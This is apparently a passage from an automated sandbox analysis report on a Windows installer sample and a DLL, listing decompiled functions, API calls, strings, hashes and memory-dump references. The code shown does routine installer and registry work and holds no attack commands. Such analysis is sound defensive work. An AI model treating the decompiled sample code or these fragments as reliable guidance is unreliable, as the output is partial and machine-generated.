SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00404598, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404598(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x004045a6
0x004045b3
0x004045b9
0x004045f7
0x004045f7
0x00404606
0x0040460d
0x00000000
0x0040460f
0x004045bb
0x004045ca
0x004045d2
0x004045d5
0x004045e7
0x004045ed
0x004045f4
0x00000000
0x004045f4
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
GetMessagePos.USER32 ref: 004045BB
ScreenToClient.USER32 ref: 004045D5
SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D

Strings

f, xrefs: 004045E9

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414b78; // 0x4b8ef
					_t11 =  *0x428b88; // 0x4b8f3
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b64
0x00402b6b
0x00402b6d
0x00402b6d
0x00402b83
0x00402b93
0x00402ba5
0x00402ba5
0x00402bad

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
MulDiv.KERNEL32(0004B8EF,00000064,0004B8F3), ref: 00402B73
wsprintfA.USER32 ref: 00402B83
SetWindowTextA.USER32(?,?), ref: 00402B93
SetDlgItemTextA.USER32 ref: 00402BA5

Strings

verifying installer: %d%%, xrefs: 00402B7D

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59

Uniqueness

Uniqueness Score: -1.00%

Function 100033C0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82registrystringCOMMON

Download Yara Rule

APIs

lstrcpynW.KERNEL32(?,?,00000027), ref: 10003436
RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 10003499

Strings

(%p), xrefs: 100033DC
%s\%s\0x%08x, xrefs: 10003459
LanguageProfile, xrefs: 1000344D

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Openlstrcpyn
String ID: %s\%s\0x%08x$(%p)$LanguageProfile
API String ID: 77534328-1421907492
Opcode ID: 46edd7e52df682f74a4b4d30c36d611ffc15542ded8736f38e699b611a6b2313
Instruction ID: bcdec95f2d607e4fc0eb77369190f68030dd34f4a7564bbe946f2f6de08662e1
Opcode Fuzzy Hash: 46edd7e52df682f74a4b4d30c36d611ffc15542ded8736f38e699b611a6b2313
Instruction Fuzzy Hash: 8B31FAB5D00208EFEB04DF94C885B9EB7B9EB48305F108199E905AB356E735AE94CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10001580, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 100015A0
_memcmp.LIBCMT ref: 100015BC
_memcmp.LIBCMT ref: 100015E2
_memcmp.LIBCMT ref: 1000160B

Strings

unsupported interface: %s, xrefs: 1000163F

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID: unsupported interface: %s
API String ID: 2931989736-1937909893
Opcode ID: 8e52320923f2ce158a943d5b5a8acfdf741acb0a0bd6a2f20ef3a5411ef2854b
Instruction ID: c0289ddaac958acca42572efceb48c0f5e969638305156980df2b8405fdc2e54
Opcode Fuzzy Hash: 8e52320923f2ce158a943d5b5a8acfdf741acb0a0bd6a2f20ef3a5411ef2854b
Instruction Fuzzy Hash: BA3139B9900209EFEB00DFA0DC45BEE77B1EB88384F148468F9055F345D675EA90CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10001190, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 100011B0
_memcmp.LIBCMT ref: 100011EB

Strings

(%p)->(IID_IEnumTfInputProcessorProfiles %p), xrefs: 10001204
(%p)->(IID_IUnknown %p), xrefs: 100011C9
(%p)->(%s %p), xrefs: 10001239

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID: (%p)->(%s %p)$(%p)->(IID_IEnumTfInputProcessorProfiles %p)$(%p)->(IID_IUnknown %p)
API String ID: 2931989736-4158896418
Opcode ID: 2b89f4c4769a64c7a0d6ce6b13d4f49c4649fb8cbbf102c691703ca80465367c
Instruction ID: f3b920d8975c3dec4e6abf0cee72002c753e868fc46b7393072c9faba082f327
Opcode Fuzzy Hash: 2b89f4c4769a64c7a0d6ce6b13d4f49c4649fb8cbbf102c691703ca80465367c
Instruction Fuzzy Hash: 85211AF9D00209EBEB00DFA4DC41FEE73B4EB98280F148468F9149B345E631EA608B55

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x42ec10; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a378) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a378 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
				return 0;
			}

0x004022f6
0x004022fb
0x00402305
0x0040230f
0x00402312
0x0040231c
0x0040232c
0x00402333
0x0040233b
0x00402349
0x0040234d
0x00402358
0x00402358
0x0040235c
0x00402360
0x00402366
0x0040236b
0x0040236b
0x0040236f
0x0040237b
0x0040237b
0x00402394
0x00402396
0x00402396
0x00402399
0x0040246f
0x0040246f
0x00402880
0x0040288c

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nshA78C.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nshA78C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nshA78C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nshA78C.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nshA78C.tmp
API String ID: 1356686001-3227806388
Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69

Uniqueness

Uniqueness Score: -1.00%

Function 100016E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 10001720
RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001772
RegCloseKey.ADVAPI32(?), ref: 10001787

Strings

(%p) %s, xrefs: 10001709
%s\%s, xrefs: 1000172F

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFromString
String ID: %s\%s$(%p) %s
API String ID: 1280075732-2567790950
Opcode ID: e7468081566d5fcf6fde2c48bc0af18005790df0dad083f9e5615e3b09c16f0b
Instruction ID: 4d155ae1e09500c75846c1e235b1cef34e51d61da081fdf85d17d56b8df688a2
Opcode Fuzzy Hash: e7468081566d5fcf6fde2c48bc0af18005790df0dad083f9e5615e3b09c16f0b
Instruction Fuzzy Hash: E61186F6900208BBF710DBA0DC46FEE73BCEB48740F008458F709AA185EA71E68487A1

Uniqueness

Uniqueness Score: -1.00%

Function 100017A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100017E3
RegDeleteTreeW.ADVAPI32(80000002,?), ref: 10001825
RegDeleteTreeW.ADVAPI32(80000001,?), ref: 10001837

Strings

%s\%s, xrefs: 100017F5
(%p) %s, xrefs: 100017C9

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteTree$FromString
String ID: %s\%s$(%p) %s
API String ID: 1665489665-2567790950
Opcode ID: 06eab0ba4ac2e8f73a71aeefc6ef192684b9224c0b5c94a13ff5f3e4daec22c1
Instruction ID: cb02e4e582c7cc0f95aeb8399e39fc8d2ae1a72fe76550b5b7d06ead11313e83
Opcode Fuzzy Hash: 06eab0ba4ac2e8f73a71aeefc6ef192684b9224c0b5c94a13ff5f3e4daec22c1
Instruction Fuzzy Hash: 9A01E1F6800118EBFB10DBA49C45F9A73BCEB58305F00C155F60996105EA31EB988BB1

Uniqueness

Uniqueness Score: -1.00%

Function 10002E80, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34registrymemoryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 10002E9B
RegCloseKey.ADVAPI32(00000000), ref: 10002EB1
GetProcessHeap.KERNEL32(00000000,?), ref: 10002ED1
HeapFree.KERNEL32(00000000), ref: 10002ED8

Strings

destroying %p, xrefs: 10002E87

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHeap$FreeProcess
String ID: destroying %p
API String ID: 3033025533-3738993722
Opcode ID: 2d4eebfb721ce51961bd45fd4414be31e4c3001adc575808792bb9bb990f7086
Instruction ID: 5b59283f2627399bb63ea5609936be5ff8c51f2501e8e7f4a00345534743b0d8
Opcode Fuzzy Hash: 2d4eebfb721ce51961bd45fd4414be31e4c3001adc575808792bb9bb990f7086
Instruction Fuzzy Hash: FFF079B9210208AFD701DF54C884EAA77A9FB8D355F11C148F9098B365C735E981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec10; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405C49(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec10; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec10, 0);
				}
				return _t18;
			}

0x00402a38
0x00402a49
0x00402a51
0x00402a79
0x00402a60
0x00402a63
0x00402ab3
0x00402ab9
0x00402abb
0x00000000
0x00402abb
0x00402a70
0x00402a75
0x00402a77
0x00000000
0x00000000
0x00402a77
0x00402a8e
0x00402a96
0x00402a9d
0x00402ac3
0x00402ac9
0x00000000
0x00000000
0x00402ad1
0x00402ad7
0x00402ad9
0x00000000
0x00000000
0x00000000
0x00402ad9
0x00000000
0x00402aac
0x00402ac0

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 100031D0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 1000324E

Strings

(%p), xrefs: 100031F0
', xrefs: 10003226

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Enum
String ID: '$(%p)
API String ID: 2928410991-2641672736
Opcode ID: 994c6d8ff00e08bfe5ee1204041381d4bf1522d92665c9bf50870adcbdb19640
Instruction ID: 98191913a28e9ee06ca6f64768706f42858422ad3805355979cfa24b6b1692b0
Opcode Fuzzy Hash: 994c6d8ff00e08bfe5ee1204041381d4bf1522d92665c9bf50870adcbdb19640
Instruction Fuzzy Hash: AB4129B4D00209EFEB05CF98C985B9EB7F5FB48354F20C569E815AB285C774AA80DF91

Uniqueness

Uniqueness Score: -1.00%

Function 10002C90, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 10002D07

Strings

', xrefs: 10002CE2
(%p), xrefs: 10002CB0

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Enum
String ID: '$(%p)
API String ID: 2928410991-2641672736
Opcode ID: 10460304ef76f539916837472c472869d160d0106d875de788313cb366d878b2
Instruction ID: d6f23bb7a891aa4ae65e830c468a68ef75c51dbce02d3a74e318b2ecbae86c09
Opcode Fuzzy Hash: 10460304ef76f539916837472c472869d160d0106d875de788313cb366d878b2
Instruction Fuzzy Hash: 393108B4900209EFEB14CF84C888BEEB7F5FB48345F20855AE9056B285D374AE84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 004044B6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
			}

0x004044be
0x004044c2
0x004044ca
0x004044cd
0x004044ce
0x004044d0
0x004044d2
0x004044d5
0x004044d5
0x004044dc
0x004044e2
0x004044e2
0x004044e9
0x004044f4
0x004044f5
0x004044f8
0x004044f8
0x00404505
0x00404510
0x00404513
0x00404525
0x0040452c
0x0040452d
0x0040453c
0x0040454c
0x00404568

APIs

lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
wsprintfA.USER32 ref: 0040454C
SetDlgItemTextA.USER32 ref: 0040455F

Strings

%u.%u%s%s, xrefs: 0040452E

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
